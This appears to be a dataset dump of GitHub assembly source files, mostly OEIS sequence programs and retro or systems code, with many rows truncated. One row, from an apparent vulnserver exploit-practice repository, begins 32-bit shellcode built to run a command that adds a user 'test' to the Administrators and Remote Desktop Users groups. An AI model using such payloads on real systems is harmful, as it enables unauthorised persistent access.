max_stars_repo_path
stringlengths
3
255
max_stars_repo_name
stringlengths
5
116
max_stars_count
int64
0
107k
id
stringlengths
1
7
content
stringlengths
63
1.05M
programs/oeis/007/A007993.asm
jmorken/loda
1
51400
<gh_stars>1-10 ; A007993: Poincaré series [or Poincare series] of Lie algebra associated with a certain braid group. ; 3,12,40,102,219,419,738,1221,1923,2910,4260,6064,8427,11469,15326,20151,26115,33408,42240,52842,65467,80391,97914,118361,142083,169458,200892,236820,277707,324049,376374,435243,501251,575028,657240,748...
oeis/295/A295311.asm
neoneye/loda-programs
11
51401
<filename>oeis/295/A295311.asm<gh_stars>10-100 ; A295311: a(n) = n / A295310(n) = n / gcd(n, phi(sigma(n))). ; Submitted by <NAME> ; 1,1,3,2,5,3,7,1,3,5,11,1,13,7,15,8,17,3,19,5,21,11,23,3,5,13,27,7,29,5,31,8,33,17,35,1,37,19,13,5,41,21,43,11,15,23,47,4,49,5,17,26,53,27,55,7,57,29,59,5,61,31,21,32,65,11,67,17,69,35,71...
test/full-pipeline/should-pass/003-rtype.asm
phillid/toy-cpu-assembler
0
51402
; Test for some sort of parity between pseudo instructions for rtypes mv $0, $1 mv $H, $2 mv $2, $1 neg $1 neg $0
winxp_sp3/trun/adduser/winexec_adduser/adduser_winexec.nasm
danf42/vulnserver
0
51403
[BITS 32] global _start section .text _start: xor edx, edx ; zero out edx push edx ; push null byte onto stack ;cmd.exe net user test P@ssword123 /add & net localgroup administrators test /add & net localgroup "Remote desktop users" test /add push 0x20202064 push 0x64612f20 push 0x74...
oeis/232/A232533.asm
neoneye/loda-programs
11
51404
; A232533: a(n) = Sum_{i=1...n} Sum_{j=1..i} lcm(i,j)/i. ; Submitted by <NAME>(s3) ; 1,3,7,13,24,35,57,79,110,142,198,237,316,381,455,541,678,770,942,1058,1209,1376,1630,1781,2042,2278,2552,2789,3196,3417,3883,4225,4614,5024,5476,5812,6479,6994,7544,7996,8817,9269,10173,10784,11425,12186,13268 mov $3,$0 lpb $0 mov $...
programs/oeis/094/A094922.asm
neoneye/loda
22
51405
<reponame>neoneye/loda ; A094922: (7^n-1)/6 mod n. ; 0,0,0,0,1,0,1,0,0,8,1,0,1,8,12,0,1,0,1,0,15,8,1,0,1,8,0,8,1,18,1,0,24,8,22,0,1,8,18,0,1,36,1,4,36,8,1,0,8,8,6,36,1,0,7,8,0,8,1,0,1,8,36,0,6,6,1,60,57,8,1,0,1,8,57,20,43,30,1,0,0,8,1,36,81,8,57,16,1,18,29,32,57 add $0,1 mov $2,$0 lpb $0 sub $0,1 add $1,1 mod $1...
programs/oeis/321/A321091.asm
karttu/loda
0
51406
; A321091: Continued fraction expansion of the constant z that satisfies: CF(3*z, n) = CF(z, n) + 10, for n >= 0, where CF(z, n) denotes the n-th partial denominator in the continued fraction expansion of z. ; 4,1,2,3,2,1,3,2,1,3,1,2,3,1,2,3,2,1,3,1,2,3,1,2,3,2,1,3,1,2,3,2,1,3,2,1,3,1,2,3,2,1,3,2,1,3,1,2,3,1,2,3,2,1,3,...
run.asm
apstrand/attic-nonameos
0
51407
p386 ideal segment code para public use16 assume cs:code,ds:code,es:code image db 'init',0 start: mov ax,code mov ds,ax mov ax,3d00h mov dx,offset image int 21h mov bx,ax mov ah,3fh mov cx,-1 mov dx,7000h mov ds,dx xor dx,dx int 21h mov ah,3eh int 21h cli xor si,si xor di,di mov es,si mov ax,70...
programs/oeis/307/A307791.asm
neoneye/loda
22
51408
; A307791: Number of palindromic heptagonal numbers of length n whose index is also palindromic. ; 3,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 mov $1,$0 trn $0,1 gcd $1,3 trn $1,$0 mov $0,$1
tk_qsrc/q1source/QW/client/surf16.asm
cr88192/bgbtech_btsr1arch
15
51409
<reponame>cr88192/bgbtech_btsr1arch .386P .model FLAT externdef _d_zistepu:dword externdef _d_pzbuffer:dword externdef _d_zistepv:dword externdef _d_zrowbytes:dword externdef _d_ziorigin:dword externdef _r_turb_s:dword externdef _r_turb_t:dword externdef _r_turb_pdest:dword externdef _r_turb_spancount:dword ...
Transynther/x86/_processed/NONE/_st_/i7-7700_9_0xca.log_21829_829.asm
ljhsiun2/medusa
9
51410
<reponame>ljhsiun2/medusa .global s_prepare_buffers s_prepare_buffers: push %r12 push %r15 push %r8 push %r9 push %rax push %rbp push %rcx push %rdi push %rsi lea addresses_UC_ht+0xe055, %r15 nop nop nop nop cmp $1273, %r12 mov (%r15), %rax nop nop nop xor %rbp, %rbp lea addresses_WT_ht+0x1cbf5, %r12 clflush (%r12) nop...
examples/pxScene2d/external/libnode-v0.12.7/deps/openssl/asm/x64-win32-masm/aes/aesni-sha1-x86_64.asm
madanagopaltcomcast/pxCore
2,494
51411
OPTION DOTNAME .text$ SEGMENT ALIGN(64) 'CODE' EXTERN OPENSSL_ia32cap_P:NEAR PUBLIC aesni_cbc_sha1_enc ALIGN 16 aesni_cbc_sha1_enc PROC PUBLIC mov r10d,DWORD PTR[((OPENSSL_ia32cap_P+0))] mov r11d,DWORD PTR[((OPENSSL_ia32cap_P+4))] jmp aesni_cbc_sha1_enc_ssse3 DB 0F3h,0C3h ;repret aesni_cbc_sha1_enc ENDP ALIGN ...
dzx7b_fast_r800.asm
uniabis/z80depacker
25
51412
; ----------------------------------------------------------------------------- ; ZX7 Backwards by <NAME>, <NAME> ; "Standard" version (156/177/184 bytes only) for R800 ; ----------------------------------------------------------------------------- ; Parameters: ; HL: source address (compressed data) ; DE: destinat...
tools/atr_chng.asm
alexanderbazhenoff/zx-spectrum-various
0
51413
<filename>tools/atr_chng.asm ORG #CD78 ATTR EQU 9 LD HL,#596B LD DE,#16 LD BC,#0A02 ATRC_L0 HALT PUSH BC PUSH HL ATRC_L1 PUSH BC ATRC_L2 LD (HL),ATTR INC HL DJNZ ATRC_L2 ADD HL,DE POP BC DEC C JR NZ,ATRC_L1 POP ...
MIPS-Simulator/sum.asm
charlesats/Exercicios_AEDs
0
51414
<filename>MIPS-Simulator/sum.asm<gh_stars>0 .text la $a0, array la $a1, array_size lw $a1, 0($a1) loop: sll $t1, $t0, 2 add $t2, $a0, $t1 sw $t0, 0($t2) addi $t0, $t0, 1 add $t4, $t4, $t0 slt $t3, $t0, $a1 bne $t3, $zero, loop la $a0, message add $a0, $t4, $zero nop .data array: .word ...
gfx/tilesets/facility_palette_map.asm
Dev727/ancientplatinum
28
51416
tilepal 0, GRAY, WATER, BROWN, BROWN, BROWN, BROWN, BROWN, BROWN tilepal 0, BROWN, BROWN, GRAY, GRAY, RED, RED, BROWN, BROWN tilepal 0, ROOF, ROOF, BROWN, BROWN, BROWN, BROWN, GRAY, GRAY tilepal 0, ROOF, ROOF, GRAY, GRAY, ROOF, ROOF, BROWN, BROWN tilepal 0, ROOF, ROOF, GREEN, WATER, WATER, WATER, RED, RED tilepal...
lib/keyboard.asm
oldgitcodemonkey/HighScoreLib
0
51418
* = * "Keyboard Scan Routine" // ZERO PAGE Varibles .const ScanResult = $e0 // 8 bytes .const BufferNew = $e8 // 3 bytes .const KeyQuantity = $eb // 1 byte .const NonAlphaFlagX = $ec // 1 byte .const NonAlphaFlagY = $ef // 1 byte .const TempZP = $...
programs/oeis/225/A225007.asm
neoneye/loda
22
51420
<filename>programs/oeis/225/A225007.asm ; A225007: Number of n X 5 0..1 arrays with rows unimodal and columns nondecreasing. ; 16,86,296,791,1792,3612,6672,11517,18832,29458,44408,64883,92288,128248,174624,233529,307344,398734,510664,646415,809600,1004180,1234480,1505205,1821456,2188746,2613016,3100651,3658496,4293872,...
cpm2/RomWBW/Source/Apps/SysCopy.asm
grancier/z180
0
51421
<reponame>grancier/z180<filename>cpm2/RomWBW/Source/Apps/SysCopy.asm<gh_stars>0 ;=============================================================================== ; SysCopy - Copy System Image to/from reserved tracks of disk for RomWBW ; adaptation of CP/M 2.2 ;===============================================...
programs/oeis/127/A127906.asm
neoneye/loda
22
51422
; A127906: a(n) = (n in base 10) * (n in base 2). ; 0,1,20,33,400,505,660,777,8000,9009,10100,11121,13200,14313,15540,16665,160000,170017,180180,190209,202000,212121,222420,232553,264000,275025,286260,297297,310800,321929,333300,344441,3200000,3300033,3400340,3500385,3603600,3703737,3804180,3904329,4040000,4141041,4242...
PRG/levels/Plains/3-9.asm
narfman0/smb3_pp1
0
51423
; Original address was $B108 ; 3-9 .word W309_EndL ; Alternate level layout .word W309_EndO ; Alternate object layout .byte LEVEL1_SIZE_09 | LEVEL1_YSTART_040 .byte LEVEL2_BGPAL_02 | LEVEL2_OBJPAL_08 | LEVEL2_XSTART_18 .byte LEVEL3_TILESET_01 | LEVEL3_VSCROLL_LOCKED | LEVEL3_PIPENOTEXIT .byte LEVEL4_BGBANK_INDEX(...
libsrc/genmath/pushfa.asm
dex4er/deb-z88dk
1
51425
; ; Z88dk Generic Floating Point Math Library ; ; Push FA onto the stack ; ; $Id: pushfa.asm,v 1.1 2002/01/21 20:35:22 dom Exp $: XLIB pushfa XDEF pushf2 XREF fa .pushfa ex de,hl .pushf2 ld hl,(fa) ex (sp),hl push hl ld hl,(fa+2) ex (sp),h...
examples/sir.asm
ihh/bbcmicrobot-codec
10
51426
<reponame>ihh/bbcmicrobot-codec ;; The Susceptible-Infected-Recovered model from epidemiology INIT_TYPE = 3 INIT_COUNT = 0 ; i.e. 256 DELAY = 0 START: INCLUDE "cursor.asm" INCLUDE "cls.asm" INCLUDE "typedinit.asm" lda #1 jsr WRITE INCLUDE "delay.asm" INCLUDE "reaction-diffusion.asm" VDU_INIT_LEN = 3 VDU_...
libsrc/_DEVELOPMENT/arch/zx/misc/z80/asm_zx_cls_wc_attr.asm
jpoikela/z88dk
640
51427
<filename>libsrc/_DEVELOPMENT/arch/zx/misc/z80/asm_zx_cls_wc_attr.asm ; =============================================================== ; 2014 ; =============================================================== ; ; void zx_cls_wc_attr(struct r_Rect8 *r, uchar attr) ; ; Clear the rectangular area on screen. ; ; ========...
libsrc/_DEVELOPMENT/math/float/math48/c/sdcc_ix/cm48_sdccix_islessgreater_callee.asm
jpoikela/z88dk
640
51429
; int islessgreater(float x, float y) __z88dk_callee SECTION code_clib SECTION code_fp_math48 PUBLIC cm48_sdccix_islessgreater_callee EXTERN am48_islessgreater, cm48_sdccixp_dcallee2 cm48_sdccix_islessgreater_callee: call cm48_sdccixp_dcallee2 ; AC'= y ; AC = x jp am48_islessgreater
libsrc/newbrain/zcall.asm
grancier/z180
0
51430
; ; Grundy Newbrain Specific libraries ; ; <NAME> - 19/05/2007 ; ; ; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ; ; This function is linked only in the non-CP/M version ; it calls the ROM functions via the standard rst entry ; ; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ; ; Used inter...
oeis/176/A176037.asm
neoneye/loda-programs
11
51431
<reponame>neoneye/loda-programs ; A176037: a(n) = n!*(n+1)!*(n+2)!. ; Submitted by <NAME> ; 2,12,288,17280,2073600,435456000,146313216000,73741860864000,53094139822080000,52563198423859200000,69383421919494144000000,119061952013851951104000000,260031303198252661211136000000 mov $1,2 mov $2,2 lpb $0 mul $1,$0 sub $...
MdePkg/Library/BaseCpuLib/AArch64/CpuSleep.asm
KrzysztofKoch1/edk2
2,757
51432
;------------------------------------------------------------------------------ ; ; CpuSleep() for AArch64 ; ; Copyright (c) 2006 - 2009, Intel Corporation. All rights reserved.<BR> ; Portions copyright (c) 2008 - 2009, Apple Inc. All rights reserved.<BR> ; Portions copyright (c) 2011 - 2013, ARM LTD. All rights ...
sound/sfxasm/D7.asm
NatsumiFox/Sonic-3-93-Nov-03
7
51434
<filename>sound/sfxasm/D7.asm D7_Header: sHeaderInit ; Z80 offset is $DE73 sHeaderPatch D7_Patches sHeaderTick $01 sHeaderCh $02 sHeaderSFX $80, $05, D7_FM5, $90, $00 sHeaderSFX $80, $C0, D7_PSG3, $00, $00 D7_FM5: sPatFM $00 ssModZ80 $01, $01, $C5, $1A dc.b nF7, $07 sStop D7_PSG3: sVolEnvPSG v07 dc....
string.asm
jeremycollake/jcalg1
3
51435
; JCALG1 r5.13, by <NAME> ; --------------------------- ; optimized string operations ; --------------------------- _movsd MACRO mov eax,[esi] mov [edi],eax add esi,4 add edi,4 ENDM rep_movsd MACRO LOCAL _movsd_loop,_movsd_end test ecx,ecx jz _movsd_end _movsd_loop: _movsd dec ecx jnz _movsd_loop _movsd_end:...
programs/oeis/033/A033940.asm
ckrause/cm
22
51436
<reponame>ckrause/cm<filename>programs/oeis/033/A033940.asm ; A033940: a(n) = 10^n mod 7. ; 1,3,2,6,4,5,1,3,2,6,4,5,1,3,2,6,4,5,1,3,2,6,4,5,1,3,2,6,4,5,1,3,2,6,4,5,1,3,2,6,4,5,1,3,2,6,4,5,1,3,2,6,4,5,1,3,2,6,4,5,1,3,2,6,4,5,1,3,2,6,4,5,1,3,2,6,4,5,1,3,2,6,4,5,1,3,2,6,4,5,1,3,2,6,4,5,1,3,2,6 mov $1,3 lpb $0 sub $0,1 ...
multimedia/directx/dxg/d3d/dx6/pipeln/i386/light.asm
npocmaka/Windows-Server-2003
17
51437
.486p .model flat include offsets.asm .data one DWORD 3f800000h a1 dd 0.47 ; Constants to compute inverse square root a2 dd 1.47 v255 dd 65280.0 ; 255*256 v1_256 dd 0.00390625 ; 1/255 .code PUBLIC _Directional2P5S ; Pentium optimized, ...
kernel/boot.asm
linxin8/os
3
51439
<reponame>linxin8/os<filename>kernel/boot.asm ;------------- loader和kernel ---------- LOADER_BASE_ADDR equ 0x900 LOADER_STACK_TOP equ LOADER_BASE_ADDR LOADER_START_SECTOR equ 0x2 KERNEL_BIN_BASE_ADDR equ 0x70000 ;内核读取的存放的内存地址 KERNEL_START_SECTOR equ 0x9 ;内核在磁盘上的起始扇区 ;KERNEL_ENTRY_POINT equ 0xc0001500 ...
oeis/124/A124280.asm
neoneye/loda-programs
11
51440
<reponame>neoneye/loda-programs ; A124280: Expansion of 1/(1-x-x^2+x^3-x^4). ; Submitted by <NAME> ; 1,1,2,2,4,5,9,12,20,28,45,65,102,150,232,345,529,792,1208,1816,2761,4161,6314,9530,14444,21821,33049,49956,75628,114356,173077,261761,396110,599150,906576,1371377,2074913,3138864 lpb $0 sub $0,1 add $4,$1 add $1,...
programs/oeis/138/A138187.asm
neoneye/loda
22
51441
<gh_stars>10-100 ; A138187: Hankel transform of binomial(2*n+3, n). ; 1,-4,3,3,-8,5,5,-12,7,7,-16,9,9,-20,11,11,-24,13,13,-28,15,15,-32,17,17,-36,19,19,-40,21,21,-44,23,23,-48,25,25,-52,27,27,-56,29,29,-60,31,31,-64,33,33,-68,35,35,-72,37,37,-76,39,39,-80,41 add $0,1 mul $0,2 seq $0,99470 ; A sequence generated from t...
programs/oeis/022/A022433.asm
neoneye/loda
22
51443
<filename>programs/oeis/022/A022433.asm ; A022433: a(n) = c(n-1) + c(n-3) where c is the sequence of numbers not in a. ; 1,3,5,8,11,15,17,21,23,26,29,32,35,38,41,44,47,51,53,57,59,63,65,69,71,75,77,81,83,87,89,93,95,98,101,104,107,110,113,116,119,122,125,128,131,134,137,140,143,146,149,152,155,158,161,164,167,170,173,1...
programs/oeis/155/A155606.asm
neoneye/loda
22
51446
<reponame>neoneye/loda ; A155606: a(n) = 8^n + 3^n - 1. ; 1,10,72,538,4176,33010,262872,2099338,16783776,134237410,1073800872,8590111738,68720008176,549757408210,4398051294072,35184386437738,281475019757376,2251799942825410,18014398896902472,144115189238117338 mov $1,3 pow $1,$0 mov $2,8 pow $2,$0 add $1,$2 mov $0,$1 ...
stop_go_asm.asm
KarthikGangadhar/tm4c123gh6pm
0
51450
; Stop Go C/ASM Mix Example ; <NAME> ;----------------------------------------------------------------------------- ; Hardware Target ;----------------------------------------------------------------------------- ; Target Platform: EK-TM4C123GXL Evaluation Board ; Target uC: TM4C123GH6PM ; System Clock: 40 M...
programs/oeis/326/A326195.asm
neoneye/loda
22
51451
; A326195: Number of iterations of x -> A009195(x) needed to reach 1 when starting from x = n, where A009195(x) = gcd(x, phi(x)). ; 0,1,1,2,1,2,1,3,2,2,1,3,1,2,1,4,1,3,1,3,2,2,1,4,2,2,3,3,1,2,1,5,1,2,1,4,1,2,2,4,1,3,1,3,2,2,1,5,2,3,1,3,1,4,2,4,2,2,1,3,1,2,3,6,1,2,1,3,1,2,1,5,1,2,2,3,1,3,1,5,4,2,1,4,1,2,1,4,1,3,1,3,2,2,...
Transynther/x86/_processed/AVXALIGN/_st_/i9-9900K_12_0xca_notsx.log_21829_1962.asm
ljhsiun2/medusa
9
51452
.global s_prepare_buffers s_prepare_buffers: push %r10 push %r12 push %rcx push %rsi lea addresses_UC_ht+0x1c5f6, %r10 nop nop nop xor $32689, %r12 movl $0x61626364, (%r10) nop nop nop nop nop lfence pop %rsi pop %rcx pop %r12 pop %r10 ret .global s_faulty_load s_faulty_load: push %r11 push %r12 push %r13 push %r1...
programs/oeis/052/A052644.asm
neoneye/loda
22
51453
<reponame>neoneye/loda ; A052644: E.g.f. (1+3x-3x^2)/(1-x)^2. ; 1,5,12,42,192,1080,7200,55440,483840,4717440,50803200,598752000,7664025600,105859353600,1569209241600,24845812992000,418455797760000,7469435990016000,140852221526016000 mov $2,3 lpb $0 add $2,$0 mul $2,$0 sub $0,1 mov $1,$2 lpe add $1,1 mov $0,$1
programs/oeis/171/A171588.asm
neoneye/loda
22
51454
<reponame>neoneye/loda<filename>programs/oeis/171/A171588.asm ; A171588: The Pell word: Fixed point of the morphism 0->001, 1->0. ; 0,0,1,0,0,1,0,0,0,1,0,0,1,0,0,0,1,0,0,1,0,0,1,0,0,0,1,0,0,1,0,0,0,1,0,0,1,0,0,1,0,0,0,1,0,0,1,0,0,0,1,0,0,1,0,0,0,1,0,0,1,0,0,1,0,0,0,1,0,0,1,0,0,0,1,0,0,1,0,0,1,0,0,0,1,0,0,1,0,0,0,1,0,0,...
text/maps/ss_anne_8.asm
adhi-thirumala/EvoYellow
16
51455
<reponame>adhi-thirumala/EvoYellow _SSAnne8Text8:: text "WIGGLYTUFF: Puup" line "pupuu!@@" _SSAnne8BattleText1:: text "I travel alone" line "on my journeys!" para "My #MON are my" line "only friends!" done _SSAnne8EndBattleText1:: text "My, my" line "friends..." prompt _SSAnne8AfterBattleText1:: text "Yo...
Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_1268.asm
ljhsiun2/medusa
9
51457
<reponame>ljhsiun2/medusa<filename>Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_1268.asm .global s_prepare_buffers s_prepare_buffers: push %r11 push %r8 push %rax push %rbp push %rbx push %rcx push %rdi push %rsi lea addresses_UC_ht+0x135af, %r11 clflush (%r11) nop nop nop cmp %rbx, %rbx mov (%...
maps/RuinsOfAlphKabutoWordRoom.asm
Dev727/ancientplatinum
28
51458
<reponame>Dev727/ancientplatinum<filename>maps/RuinsOfAlphKabutoWordRoom.asm RuinsOfAlphKabutoWordRoom_MapScripts: db 0 ; scene scripts db 0 ; callbacks RuinsOfAlphKabutoWordRoom_MapEvents: db 0, 0 ; filler db 3 ; warp events warp_event 9, 5, RUINS_OF_ALPH_KABUTO_ITEM_ROOM, 3 warp_event 10, 5, RUINS_OF_ALPH...
sources/ippcp/asm_intel64_gas_converted/linux/nonpic/n0/merged/pcpbnumulschoolsrvl9.asm
idesai/ipp-crypto
1
51459
############################################################################### # Copyright 2018 Intel Corporation # All Rights Reserved. # # If this software was obtained under the Intel Simplified Software License, # the following terms apply: # # The source code, information and material ("Material") containe...
oeis/308/A308632.asm
neoneye/loda-programs
11
51460
<reponame>neoneye/loda-programs<gh_stars>10-100 ; A308632: Largest aggressor for the maximum number of peaceable coexisting queens as given in A250000. ; 0,0,2,3,4,6,7,10,12,15,19 lpb $0 mov $2,$0 seq $2,132635 ; Number of primes, 0's, and 1's in [0, n^2). sub $2,$0 div $0,5 add $3,$2 lpe mov $0,$3
src/kernel/boot/entry64.asm
tact1m4n3/bootstrap-os
0
51461
<gh_stars>0 [section .text] [bits 64] [global start64] [extern kernel_main] start64: mov ax, 0 mov ss, ax mov ds, ax mov es, ax mov fs, ax mov gs, ax mov rcx, qword higher_half jmp rcx higher_half: invlpg [0] add rsp, 0xFFFFFF8000000000 ; stack pointer for higher half a...
Build/Interpreters/beebOzmoo/asm/memory.asm
polluks/Puddle-BuildTools
38
51462
<filename>Build/Interpreters/beebOzmoo/asm/memory.asm<gh_stars>10-100 ; Routines to handle memory ; !ifndef VMEM { ; !zone { ; read_byte_at_z_address ; ; Subroutine: Read the contents of a byte address in the Z-machine ; ; a,x,y (high, mid, low) contains address. ; ; Returns: value in a ; sty mempointer ...
Transynther/x86/_processed/NONE/_xt_/i7-8650U_0xd2.log_21829_1146.asm
ljhsiun2/medusa
9
51464
<reponame>ljhsiun2/medusa<gh_stars>1-10 .global s_prepare_buffers s_prepare_buffers: push %r10 push %r13 push %r14 push %r15 push %rcx push %rdi push %rdx push %rsi lea addresses_WC_ht+0x21dd, %rdx nop nop nop nop xor %r13, %r13 vmovups (%rdx), %ymm3 vextracti128 $0, %ymm3, %xmm3 vpextrq $1, %xmm3, %rsi nop sub %rsi, %...
projects/08/FunctionCalls/FibonacciElement/FibonacciElement.asm
Youngermaster/Nand2Tetris-Solutions
0
51465
<reponame>Youngermaster/Nand2Tetris-Solutions // <NAME> @256 D=A @SP M=D @return-address-sysinit D=A @SP A=M M=D @SP M=M+1 @LCL D=M @SP A=M M=D @SP M=M+1 @ARG D=M @SP A=M M=D @SP M=M+1 @THIS D=M @SP A=M M=D @SP M=M+1 @THAT D=M @SP A=M M=D @SP M=M+1 @SP D=M @5 D=D-A @ARG M=D @SP D=M @LCL M=D @Sys.init 0;JMP (return-add...
private/windows/media/avi/drawdib.16/dith666a.asm
King0987654/windows2000
17
51466
page ,132 ;----------------------------Module-Header------------------------------; ; Module Name: DITH666.ASM ; ; code to dither 16,24,32 bit DIBs to a 8bit DIB with a fixed palette ; ; NOTES: ; this is a ASM version of the code found in dith666.c ; ;--------------------------------------------------...
programs/oeis/053/A053535.asm
neoneye/loda
22
51468
<reponame>neoneye/loda<filename>programs/oeis/053/A053535.asm ; A053535: Expansion of 1/((1+3*x)*(1-9*x)). ; 1,6,63,540,4941,44226,398763,3586680,32286681,290560446,2615103063,23535750420,211822285221,1906398972666,17157595536963,154418345483760,1389765152400561,12507886242464886,112570976569604463,1013138787964178700,...
test_programs/teleball.asm
mfkiwl/QNICE-FPGA-hyperRAM
53
51469
; 8x8 Playfield of TeleBall ; can be used as an inspiration of actually doing an 8x8 TeleBall on QNICE :-) ; needs VGA ; done by sy2002 in January 2017 #include "../dist_kit/sysdef.asm" #include "../dist_kit/monitor.def" .ORG 0x8000 SYSCALL(vga_cls, 1) MOVE VGA$STAT...
oeis/118/A118061.asm
neoneye/loda-programs
11
51470
; A118061: 9800*n^2-5740*n-4059 ; Submitted by <NAME>(s1) ; 1,23661,66921,129781,212241,314301,435961,577221,738081,918541,1118601,1338261,1577521,1836381,2114841,2412901,2730561,3067821,3424681,3801141,4197201,4612861,5048121,5502981,5977441,6471501,6985161,7518421,8071281,8643741,9235801,9847461,10478721,11129581,118...
oeis/022/A022372.asm
neoneye/loda-programs
11
51472
<filename>oeis/022/A022372.asm ; A022372: Fibonacci sequence beginning 2, 20. ; 2,20,22,42,64,106,170,276,446,722,1168,1890,3058,4948,8006,12954,20960,33914,54874,88788,143662,232450,376112,608562,984674,1593236,2577910,4171146,6749056,10920202,17669258,28589460,46258718,74848178,121106896,195955074,317061970,513017044...
src/main/fragment/mos6502-common/vdum1=vdum1_plus_vwum2.asm
jbrandwood/kickc
2
51473
<reponame>jbrandwood/kickc<filename>src/main/fragment/mos6502-common/vdum1=vdum1_plus_vwum2.asm lda {m1} clc adc {m2} sta {m1} lda {m1}+1 adc {m2}+1 sta {m1}+1 lda {m1}+2 adc #0 sta {m1}+2 lda {m1}+3 adc #0 sta {m1}+3
Driver/Keyboard/Toshiba/Toshiba84J/keyboard.asm
steakknife/pcgeos
504
51476
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Copyright (c) GeoWorks 1993 -- All Rights Reserved PROJECT: PC/GEOS FILE: keyboard.asm AUTHOR: <NAME>, Nov 19, 1993 REVISION HISTORY: Name Date Description ---- ---- ----------- Tera 11/19/93 Initial revision DESCR...
programs/oeis/119/A119032.asm
neoneye/loda
22
51477
; A119032: a(n+2)=18a(n+1)-a(n)+8. ; 0,9,170,3059,54900,985149,17677790,317215079,5692193640,102142270449,1832868674450,32889493869659,590178020979420,10590314883759909,190035489886698950,3410048503076821199,61190837565496082640 mul $0,3 add $0,1 mov $1,1 mov $2,2 lpb $0 sub $0,1 add $2,$1 add $1,$2 lpe div $1,8...
programs/oeis/286/A286778.asm
karttu/loda
1
51478
<filename>programs/oeis/286/A286778.asm ; A286778: Sum of the common path length over all 2-tuples of nodes in a complete binary tree of height n. ; 0,2,22,142,734,3390,14718,61694,253438,1029118,4151294,16683006,66904062,267993086,1072791550,4292935678,17175543806,68710301694,274858508286,1099470733310,4397960527870,1...
programs/oeis/220/A220147.asm
neoneye/loda
22
51479
<filename>programs/oeis/220/A220147.asm<gh_stars>10-100 ; A220147: Number of n X 2 arrays of the minimum value of corresponding elements and their horizontal or diagonal neighbors in a random, but sorted with lexicographically nondecreasing rows and nonincreasing columns, 0..2 n X 2 array. ; 3,11,26,52,95,163,266,416,6...
data/pokemon/base_stats/drapion.asm
AtmaBuster/pokeplat-gen2
6
51480
<filename>data/pokemon/base_stats/drapion.asm db 0 ; species ID placeholder db 70, 90, 110, 95, 60, 75 ; hp atk def spd sat sdf db POISON, DARK ; type db 45 ; catch rate db 175 ; base exp db NO_ITEM, POISON_BARB ; items db GENDER_F50 ; gender ratio db 20 ; step cycles to hatch INCBIN "gfx/pokemo...
Bank_B/7_dacwrites.asm
ndf-zz/fv1testing
0
51481
; FV-1 Testing ; ; Program: DAC Mult Write ; ; Expected output: ; - MAXVAL or MINVAL equ minval 0x800000 equ maxval 0x7fffff clr or minval wrax DACL,0.0 ; pad to halfway nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop nop...
oeis/036/A036910.asm
neoneye/loda-programs
11
51482
<reponame>neoneye/loda-programs ; A036910: a(n) = (binomial(4*n, 2*n) + binomial(2*n, n)^2)/2. ; Submitted by <NAME>(s3) ; 1,5,53,662,8885,124130,1778966,25947612,383358645,5719519850,85990654178,1300866635172,19780031677718,302045506654052,4629016098160220,71163013287905912,1096960888092571317,16949379732631632570,262...
Library/Pref/Prefspui/prefspuiDynamicList.asm
steakknife/pcgeos
504
51483
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Copyright (c) Geoworks 1994 -- All Rights Reserved PROJECT: Pref MODULE: Prefspui FILE: prefspuiDynamicList.asm AUTHOR: <NAME>, Sep 27, 1994 ROUTINES: Name Description ---- ----------- REVISION HISTORY: Name...
Chapter-03/src/ch03-helloworld64.asm
fengjixuchui/Binary-Analysis-Cookbook
26
51484
; ch03_helloworld64.asm ; by <NAME> ; Date - 2019 global _start section .text _start: ; __NR_write 1 ; ssize_t write(int fd, const void *buf, size_t count); xor rax,rax xor rdi,rdi xor rsi,rsi xor rdx,rdx xor r14,r14 xor r15,r15 inc rax inc rdi mov r14,0x00000a21646c726f m...
src/bigOS-0.0.2.asm
Bigsby/bigOS
0
51485
; ; A simple boot sector that prints a message to the screen using a BIOS routine. ; [org 0x7c00] ; instruct loader where the code is loaded mov bx, WELCOME_MESSAGE call print_string jmp $ ; Jump to the current address (i.e. forever). WELCOME_MESSAGE: db "Bi...
include/joypad.asm
ZaidMade/AlchemyQuest
0
51486
IF !DEF(JOYPAD_ASM) JOYPAD_ASM SET 1 jpad_GetKeys:: ; Uses AF, B ; get currently pressed keys. Register A will hold keys in the following ; order: MSB --> LSB (Most Significant Bit --> Least Significant Bit) ; Down, Up, Left, Right, Start, Select, B, A ; This works by writing ; get action buttons: A, B, Star...
programs/oeis/160/A160588.asm
neoneye/loda
22
51487
; A160588: Interleaving of A053645 and A000027. ; 0,1,0,2,1,3,0,4,1,5,2,6,3,7,0,8,1,9,2,10,3,11,4,12,5,13,6,14,7,15,0,16,1,17,2,18,3,19,4,20,5,21,6,22,7,23,8,24,9,25,10,26,11,27,12,28,13,29,14,30,15,31,0,32,1,33,2,34,3,35,4,36,5,37,6,38,7,39,8,40,9,41,10,42,11,43,12,44,13,45,14,46,15,47,16,48,17,49,18,50 add $0,2 mov ...
libsrc/graphics/tiki100/clg.asm
jpoikela/z88dk
38
51488
<filename>libsrc/graphics/tiki100/clg.asm<gh_stars>10-100 ; ; Clear Graphics Screen ; ; TIKI-100 version by <NAME>, Sept 2015 ; ; $Id: clg.asm,v 1.2 2016-07-02 09:01:36 dom Exp $ ; SECTION code_graphics PUBLIC clg PUBLIC _clg EXTERN generic_console_cls defc clg = generic_console...
src/test/ref/cpu-65c02.asm
jbrandwood/kickc
2
51489
// Test the 65C02 CPU // A program that uses 65C02 instructions .cpu _65c02 // Commodore 64 PRG executable file .file [name="cpu-65c02.prg", type="prg", segments="Program"] .segmentdef Program [segments="Basic, Code, Data"] .segmentdef Basic [start=$0801] .segmentdef Code [start=$80d] .segmentdef Data [startAfter="Co...
Transynther/x86/_processed/NONE/_xt_/i7-8650U_0xd2.log_21829_1485.asm
ljhsiun2/medusa
9
51490
